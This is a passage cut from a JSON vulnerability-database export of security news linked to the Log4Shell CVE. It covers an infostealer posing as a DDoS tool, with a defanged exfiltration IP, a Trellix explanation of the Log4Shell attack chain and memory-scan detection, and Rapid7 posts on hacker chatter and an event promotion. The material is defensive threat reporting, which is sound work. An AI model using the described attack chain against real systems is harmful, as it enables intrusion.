Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. Rather, evidence shows that they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing enforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. \u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals \u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2022-01-19T00:00:00", "description": "# Log4J and The Memory That Knew Too Much\n\nBy Trellix \u00b7 January 19, 2022\n\n_By Guilherme Venere, Ismael Valenzuela, Carlos Diaz, Cesar Vargas, Leandro Costantino, Juan Olle, Jose Luis Sanchez Martinez, AC3 Team_\n\n_Collaborators: Steve Povolny, Douglas McKee, Mark Bereza, Frederick House, Dileep Kumar Jallepalli_\n\nThere is never a dull moment in the cybersecurity industry and there is no better time than now to embrace this notion as an advantage and catalyst for business empowerment. \n\nCurrently, professionals across the globe continue to combat the latest threat facing businesses where no vertical is immune. We\u2019ve seen an increase in the analysis and patching of the Log4Shell vulnerability in the Apache Log4j Java-based logging platform for a good reason - Log4j is one of, if not the most popular logging applications used by developers. But businesses also need to think beyond patching, as we are seeing Log4Shell shift what we think of as an attack surface. \n\nThe potential for large-scale damage and this vulnerability to proliferate is high, so this impact must be taken seriously now to better plan and safeguard against the next major flaw.\n\nWhile patching is critical, it shouldn\u2019t be a static or one-time fix to ensure infrastructure security. Instead, an always-on approach combining extensive monitoring, assessment, scanning, and forensics must be implemented to provide the agility needed against today\u2019s more modern threats. \n\nSpecifically, in this post we show how an endpoint solution with performant memory scanning capabilities can effectively detect active exploitation scenarios and complement your company\u2019s network security capabilities to create a new kind of resiliency for your organization. \n\n##### Background\n\nAs those across the security industry are aware, yet another new vulnerability affecting a widely used library was released just in time for the 2021 holiday season. CVE-2021-44228 reported a vulnerability in the Log4j Java library affecting applications and web sites using the library to perform logging.\n\nThe vulnerability allowed an attacker to coerce the vulnerable site or application to load and execute a malicious Java code from an untrusted remote location. Attack vectors are varied but the most common is associated with the attacker sending crafted strings as part of a network protocol to the target machine, for example a modified HTTP Header sent as part of a POST request.\n\nThis is the reason many defenders are now focusing their efforts on detecting the malicious strings through network traffic and recognizing that proactivity is critical to drive positive results. However, network signatures can be bypassed and there are reports confirming threat actors are adapting their network attacks with various forms of obfuscation to elude network scanning. The image below shows some of the current obfuscation techniques that have been observed or reported related to this attack.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/log4j-knew1.png) \nSource: <https://github.com/mcb2Eexe/Log4j2-Obfucation> \n \n\n\nNow, this doesn\u2019t mean that network protection solutions are not useful against this attack! In fact, Log4j is proving just how critical it is for defenders to be as adaptable as attackers and enter a new era of living security \u2013 embracing a more dynamic approach and mindset. Network security platforms provide a first layer of defense and should be used as part of an embedded security architecture (security risk treatment strategy), augmented by additional layers of protection, detection, visibility, and response. \n\nModern endpoint solutions are uniquely positioned to complement network-based capabilities with in-depth, host-based visibility of system processes, such as in-memory scanning and rapid response orchestration. This combination results in a robust defense against threats like Log4Shell and allows businesses to build back confidence via end-to-end security. \n\n##### \u2018I See You\u2019: Memory Scanning #FTW\n\nMemory scanning can provide further value and help network security platforms when a connection arrives to the endpoint after defeating the obfuscation layers. The diagram below shows the execution flow for a common web-based Log4j attack.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/log4j-knew2.png) \n \n\n\nLet\u2019s outline what happens:\n\n * **Step #1:** An attacker sends a specially-crafted string to the web server hosting the vulnerable application. This string, as we see, can be obfuscated to bypass network-based signatures.\n * **Step #2:** The application proceeds to de-obfuscate this string to load it in memory. Once loaded into memory, the application initiates a LDAP connection to request the address of where the malicious class file is located.\n * **Step #3:** The attacker-controlled LDAP server responds with the location of the malicious class file by indicating the HTTP URL address of where it is hosted.\n * **Step #4:** The vulnerable application will proceed to initiate a download of the malicious class file.\n * **Step #5:** The vulnerable application will load and run the malicious class file from Step #4. At this moment, the attacker achieves code execution on the target, leaving traces that may provide visibility on this activity for the defender. This can include spawning additional processes or touching files and registry keys after an exploitation. \n\nImagine if we could outsmart the obfuscation tactics? You absolutely can \u2013 and should \u2013 to get ahead of threats like Log4j. This can be accomplished by triggering a memory scan at some point in this execution flow to detect the presence of the malicious code file. We would have a high probability to find the de-obfuscated string used within the process memory at that time. If the memory is scanned after the malicious class file is downloaded, that content would also be available for scanning in its de-obfuscated form.\n\nSuch possibilities make the memory signature performant and efficient, given the timing of the detection mainly depends on the trigger used to start the memory scan.\n\n##### Endpoint Security Expert Rules meets Memory Scan\n\nOur solution allows organizations to do just that, delivering the ability to trigger a memory scan from an Expert Rule.\n\nExpert Rules are customizable access control rules that end-users employ to detect suspicious activity not commonly seen by other scanners. We also provides community Expert Rules mapped to the MITRE ATT&CK Matrix through our public GitHub.\n\nThese capabilities let us target the applications vulnerable to Log4j and identify the moment they are being exploited. Consider the following rule:\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/log4j-knew3.png) \n \n\n\nHere we see a section defining ACTORS (inside the Process {\u2026} section) and TARGETS (inside the Target {\u2026} section). ACTORS are any process that may be vulnerable to the Log4j exploit. In this case, we see JAVA.EXE for standalone Java applications and TOMCAT?.EXE for Apache web-based applications. Either of these processes need to load both JAVA.DLL and JVM.DLL to ensure the Java runtime is active.\n\nThe TARGET section includes any potential payload from the attack. As Expert Rules are not focused on network traffic, we need to focus on the last step of the execution flow, which is when the payload is executed. Additional triggers like files or registry keys accessed can be added as more information about exploits become available. We can also include any exclusion of valid behavior as shown in the example above using \u201cExclude\u201d as the command line parameter. This exclusion is something customers can tailor to their environment to avoid false positives, creating better efficiencies when combating threats. \n\nThis Expert Rule will trigger when any ACTOR process spawns any of the TARGET payloads. It is important to note how certain nuances can affect outcomes and false positives. Take a look at this line at the beginning of the rule:\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/log4j-knew4.png) \n \n\n\nThis instruction initiates a memory scan against the ACTOR process which caused the Expert Rule to trigger. Now we have a reliable trigger for a performant memory scan, avoiding any performance issues that could arise from a blind memory scan. A bonus is that this scan is done at a time very close to the initial exploitation attempt, which guarantees the de-obfuscated string will be in memory.\n\nNext, we scan the memory of the process which triggered the Expert Rule, executed by the AV DAT Engine. Once this string is found, detection will occur on the affected process, and the action configured in the Expert Rule REACTION line will be applied. We recommend you use the REPORT action initially until you have sorted out what processes you need to monitor.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/log4j-knew5.png) \n \n\n\nThe first event highlighted above is the Expert Rule triggering for a suspicious process spawning from JAVA.EXE, and the second shows the AV DAT detection indicating the memory of that process had signatures of the exploit.\n\n##### Note:\n\nIf the Expert Rule detection was solely present and NOT the Java Naming and Directory Interface (JNDI)/Log4j-Exploit event, it would indicate a program has executed suspicious children processes, and customers are advised to review the event and improve the Expert Rule accordingly.\n\nHowever, if both the Expert Rule and JNDI/Log4j-Exploit events are triggered for the same program, we have confidently detected the presence of the process being exploited.\n\nWe provide more information about our current coverage for Log4j vulnerability in KB95901 \u2013 coverage for Apache Log4j CVE-2021-44228 Remote Code Execution. This article contain links to download the Expert Rule and an added updated EXTRA.DAT, as well as details on how to set up ePO to use them in your environment.\n\nIf you\u2019d like to implement this solution, we encourage you to review the instructions in the KB and associated documentation. It is highly recommended to review the Expert Rule and customize it to your environment so you\u2019re not only thwarting or responding to active risks, but also dynamically adapting to safeguard against evolving threats. \n\n##### Conclusion\n\nTo protect an environment against attacks like Log4j, a layered, embedded strategy comprised of network security coupled with targeted endpoint memory scans allows defenders to effectively detect and prevent the attack execution flow against vulnerable systems exposed via network vectors. Our ENS Expert Rules and Custom Scan reactions are designed to enable you with such capabilities so you can apply precise countermeasures against these emerging threats and gain the upper hand and more confidence to maintain and grow your business. \n", "cvss3": {}, "published": "2022-01-19T00:00:00", "type": "trellix", "title": "Log4J and The Memory That Knew Too Much", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-19T00:00:00", "id": "TRELLIX:908157CFA8050AA23921170E873187E1", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/log4j-and-the-memory-that-knew-too-much.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-12-14T23:08:05", "description": "![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/log4shell-chatter.jpg)\n\nIt's been a long few days as organizations' security teams have worked to map, quantify, and mitigate the immense risk presented by the [Log4Shell vulnerability within Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). As can be imagined, cybercriminals are working overtime as well, as they seek out ways to exploit this vulnerability.\n\n#### Need clarity on detecting and mitigating Log4Shell?\n\n[Sign up for our webinar on Thursday, December 16, 2021](<https://www.rapid7.com/about/events-webcasts/brighttalk/524370/>)\n\n \n\n\nThe Rapid7 Threat Intelligence team is tracking the attacker's-eye view and the related chatter on the clear, deep, and dark web within our [Threat Intelligence platform](<https://www.rapid7.com/products/threat-command/>). Here are 4 observations based on what we've seen at the onset of the identification of CVE-2021-44228.\n\n## 1\\. We see a spike in hacker chatter and security researchers' publications about Log4j.\n\n![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/image--1---1-.png)\n\nIncreased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise \u2013 however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what's on the horizon.\n\n## 2\\. Hackers \u2013 specifically from the Russian, Chinese, and Turkish communities \u2013 show interest in the vulnerability and are actively sharing scanners and exploits.\n\n![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/image--3---1-.png)\n\nThe following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.\n\n![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/gaMakuZonQaJeuLsXz3cWSrDRO6If3MPsgUIkj3iGS1rjLG2X5NJ1FuhbBBwkm3BHlQv1bdd16Ect_rI6cuglprD3ZEzSn-wFEPiALTXzeA3bhYna8dnEnL2W0ZmtXAUeRzaGSj7dMmN.png)Log4Shell discussion on a Russian cybercrime forum![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/XdrOplpt_joV9HDI6J7FZj4_35JbmkiUUJ9KRTY6Ohhp-DZnlBjb0ztWEPANZuy6NLfPoiHYXlOLJ5L8Ej4QiQBMa6PW2zqkbJ9xwqKrQ9xOC98WSXpbPheScvx-TITZ6FTV4KSqd45i.png)Log4j discussion on a Turkish cybercrime forum\n\n## 3\\. Code with a proof of concept for the exploit has been published on GitHub.\n\n![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/image--4---1-.png)\n\nThe underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.\n\n## 4\\. Various scanners were published on GitHub to identify vulnerable systems.\n\nScanners are the cybercriminal's tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company \u2014 regardless of size \u2014 can be a target.\n\n![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/Untitled--35-.png)Log4j Scanner Discussion on Reddit![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/image--5---1-.png)![Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations](https://blog.rapid7.com/content/images/2021/12/t8hCwTxT3RS6zRgIyIrSScwjJ2fV2CV19bzTh9ufApos9E3O5Yyk7gWauF5DTzOheyEIjNLE1R0Le5WwDD-4nbG1yTbndOW8Z8e3mJj899oSl3iIo56UOIY-SIuJupiO6_3CGOtwx4C3.png)A fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts\n\n## While others look inside, we look outside\n\nThe bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.\n\n_[Read more](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) about the Log4Shell vulnerability within Log4j, and what your team can do in response._", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T21:05:17", "type": "rapid7blog", "title": "Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T21:05:17", "id": "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "href": "https://blog.rapid7.com/2021/12/14/log4j-makes-its-appearance-in-hacker-chatter-4-observations/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:28:27", "description": "![3 Reasons to Join Rapid7\u2019s Cloud Security Summit](https://blog.rapid7.com/content/images/2022/03/cloud-summit.jpg)\n\nThe world of the cloud never stops moving \u2014 so neither can cloud security. In the face of rapidly evolving technology and a constantly changing threat landscape, keeping up with all the latest developments, trends, and best practices in this emerging practice is more vital than ever.\n\nEnter Rapid7\u2019s [third annual Cloud Security Summit](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>), which we\u2019ll be hosting this year on Tuesday, March 29. This one-day virtual event is dedicated to [cloud security best practices](<https://www.rapid7.com/fundamentals/cloud-network-security/>) and will feature industry experts from Rapid7, as well as Amazon Web Services (AWS), Snyk, and more. \n\nWhile the event is fully virtual and free, we know that the time commitment can be the most challenging part of attending a multi-hour event during the workday. With that in mind, we\u2019ve compiled a short list of the top reasons you\u2019ll definitely want to register, clear your calendar, and attend this event.\n\n## Reason 1: Get a sneak peak at some original cloud security research\n\nDuring the opening session of this year\u2019s summit, two members of Rapid7\u2019s award-winning security research team will be presenting some never-before-published research on the current state of cloud security operations, the [most common misconfigurations in 2021](<https://www.rapid7.com/info/2021-cloud-misconfigurations-research-report/>), [Log4j](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), and more.\n\nAlong with being genuinely interesting data, this research will also give you some insights and benchmarks that will help you evaluate your own [cloud security program](<https://www.rapid7.com/fundamentals/cloud-security/>), and prioritize the most commonly exploited risks in your organization's environment.\n\n## Reason 2: Learn from industry experts, and get CPE credits\n\nAlong with a handful of team member\u2019s from Rapid7\u2019s own cloud security practice, this year\u2019s summit includes a host of subject matter experts from across the industry. You can look forward to hearing from Merritt Baer, Principal in the Office of the CISO at Amazon Web Services; Anthony Seto, Field Director for Cloud Native Application Security at Snyk; Keith Hoodlet, Code Security Architect at GitHub; and more. And that doesn\u2019t even include the InsightCloudSec customers who will be joining to share their expert perspectives as well.\n\nWhile learning and knowledge gain are clearly the most important aspects here, it\u2019s always great to have something extra to show for the time you devoted to an event like this. To help make the case to your management that this event is more than worth the time you\u2019ll put in, we\u2019ve arranged for all attendees to earn 3.5 continuing professional education (CPE) credits to go toward maintaining or upgrading security certifications, such as [CISSP](<https://www.isc2.org/Certifications/CISSP#>), [CISM](<https://www.isaca.org/credentialing/cism/maintain-cism-certification>), and more. \n\n## Reason 3: Be the first to hear exciting Rapid7 announcements\n\nLast but not least, while the event is primarily focused on cloud security research, strategies, and thought leadership, we are also planning to pepper in some exciting news related to [InsightCloudSec](<https://www.rapid7.com/products/insightcloudsec/>), Rapid7\u2019s cloud-native security platform. \n\nWe\u2019ll end the day with a demonstration of the product, so you can see some of our newest capabilities in action. Whether you're already an InsightCloudSec customer, or considering a new solution for uncovering misconfigurations, automating cloud security workflows, shifting left, and more, this is the best way to get a live look at one of the top solutions available in the market today. \n\nSo what are you waiting for? Come join us, and let\u2019s dive into the latest and greatest in cloud security together.\n\n#### Join our 2022 Cloud Security Summit\n\n[Register Now](<https://www.rapid7.com/info/events-2022/rapid7-cloud-security-summit/>)\n\n \n\n\n \n**_Additional reading_**\n\n * _[Cloud Security and Compliance: The Ultimate Frenemies of Financial Services](<https://www.rapid7.com/blog/post/2022/02/17/cloud-security-and-compliance-the-ultimate-frenemies-of-financial-services/>)_\n * _[Stay Ahead of Threats With Cloud Workload Protection](<https://www.rapid7.com/blog/post/2021/12/10/stay-ahead-of-threats-with-cloud-workload-protection/>)_\n * _[InsightCloudSec Supports 12 New AWS Services Announced at re:Invent](<https://www.rapid7.com/blog/post/2021/12/06/insightcloudsec-supports-12-new-aws-services-announced-at-re-invent/>)_\n * _[Kubernetes Guardrails: Bringing DevOps and Security Together on Cloud](<https://www.rapid7.com/blog/post/2021/12/06/kubernetes-guardrails-bringing-devops-and-security-together-on-cloud/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T17:06:13", "type": "rapid7blog", "title": "3 Reasons to Join Rapid7\u2019s Cloud Security Summit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T17:06:13", "id": 